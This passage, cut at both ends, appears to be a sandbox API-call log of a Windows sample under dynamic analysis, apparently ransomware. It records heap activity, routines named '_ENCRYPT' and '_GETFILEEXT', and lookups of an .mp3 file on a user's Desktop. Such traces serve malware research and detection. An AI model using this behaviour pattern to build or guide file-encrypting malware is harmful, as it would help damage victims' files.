hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.301] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0162.301] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0162.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0162.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0162.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0162.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0162.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0162.302] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0162.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.303] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0162.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0162.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0162.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd708, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0162.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.303] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0162.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0162.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0162.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0162.303] CloseHandle (hObject=0x138) returned 1 [0162.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0162.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0162.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0162.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0162.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0162.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0162.304] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0162.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.305] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0162.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0162.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0162.305] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0162.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0162.305] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0162.305] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0162.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0162.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.306] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0162.306] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0162.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0162.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0162.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0162.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0162.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0162.306] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0162.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0162.306] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.306] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.306] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7b3530, ftCreationTime.dwHighDateTime=0x1d5e6c7, ftLastAccessTime.dwLowDateTime=0x28370490, ftLastAccessTime.dwHighDateTime=0x1d5dd89, ftLastWriteTime.dwLowDateTime=0x28370490, ftLastWriteTime.dwHighDateTime=0x1d5dd89, nFileSizeHigh=0x0, nFileSizeLow=0x13156, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="URxyJ_reG.mp3", cAlternateFileName="URXYJ_~1.MP3")) returned 0x90add8 [0162.307] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0162.308] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.308] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7b3530, ftCreationTime.dwHighDateTime=0x1d5e6c7, ftLastAccessTime.dwLowDateTime=0x28370490, ftLastAccessTime.dwHighDateTime=0x1d5dd89, ftLastWriteTime.dwLowDateTime=0x28370490, ftLastWriteTime.dwHighDateTime=0x1d5dd89, nFileSizeHigh=0x0, nFileSizeLow=0x13156, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="URxyJ_reG.mp3", cAlternateFileName="URXYJ_~1.MP3")) returned 0x90add8 [0162.308] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0162.308] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, 